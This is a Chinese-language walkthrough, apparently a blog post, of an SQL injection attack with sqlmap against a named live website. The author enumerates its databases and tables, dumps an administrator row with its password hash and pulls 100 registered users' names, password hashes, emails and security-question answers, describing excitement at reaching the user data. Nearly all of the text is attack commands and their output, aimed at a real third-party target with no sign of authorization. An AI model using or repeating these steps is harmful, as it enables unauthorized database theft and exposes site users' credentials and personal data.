SQLMAP是一款開源的滲透測試程序,它可以自動探測和利用SQL注入漏洞來獲得我們想要的數據。我們可以利用它執行特定的命令、查看文件、獲取各種數據;當然,最猥瑣的是它利用注入點拖庫的速率還是灰常讓人滿意的。
滲透開始-->
注入點:"http://so.126disk.com/search?key=A"
測試環境:?BackTrack?5??/???SQLMAP?0.9
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dbs
//?列舉數據庫?-->?126disk?,?information_schema
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-db
//?當前數據庫?-->?126disk
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--users
//?列數據庫用戶
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-user
//?當前用戶
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--tables?-D?"126disk"
//?列舉數據庫126disk的表名
獲取表名
+---------------------+
disk_admin
disk_adminlog
disk_adminmsg
disk_collection
disk_count
disk_file
disk_gonggao
disk_guolv
disk_haoyou
disk_integral
disk_integrallog
disk_jubao
disk_link
disk_links
disk_message
disk_mulu
disk_search
disk_server
disk_tag
disk_type
disk_user
disk_userlog
disk_visitors
disk_zhuanji
+----------------------+
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_admin"?-D?"126disk"
//?獲取表disk_admin的列名
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,login,pass,user"?-T?"disk_admin"?-D?"126disk"
//?獲取表disk_admin中的數據,包含列?id,login,pass,user???-->?1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_user"?-D?"126disk"
//?獲取表disk_user的列名
當看到這些列名時,心中是莫名的激動。里面可都是注冊用戶的數據啊
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,name,pass,email,wenti,daan"?-T?"disk_user"?-D?"126disk"?--start?1?--stop?100
//?獲取表disk_user的前100條數據,包含id,name,pass,email,wenti,daan;這里已經開始拖庫了
SQLMAP是非常人性化的,它會將獲取的數據存儲在/pentest/web/scanners/sqlmap/output/so.126disk.com/dump/126disk/
補充:?在獲取數據的過程中會詢問是否破解HASH密碼,這里選擇n,我們不急于破解密文